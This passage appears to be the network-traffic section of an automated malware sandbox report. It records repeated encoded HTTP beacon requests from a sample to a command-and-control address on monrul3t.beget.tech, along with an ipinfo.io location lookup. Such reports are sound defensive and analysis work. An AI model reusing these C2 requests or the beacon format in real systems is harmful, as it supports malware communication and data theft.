zMhdzYlNGNxEWNwQGZmN2YhJyes0nI5EjbJhXSq9EMJp2T3FkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJlHUp9maJd3ZEpVMRdkW3VERNlXVE9UNVJTWoJlMO1mQUpFNVdVW4VkMNNTTq5ENZ1mTwsGVNtGZE1EeJNETp1EWidWRq5UavpWS0cGVOlmWt1EMNpWWqZ1VNNTSy0UeRdkWyUkMZtmRq5EbSJjTsJVbalmTt5EbCpnTtJlaZtmS5VmNJNVWwY0RSBDaYpVa3NlT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJlnW1x2RjxmVHJGVKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUej
NTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic HTTP traffic detected: GET /json HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: monrul3t.beget.tech Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dFp2TxkkaPhXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRq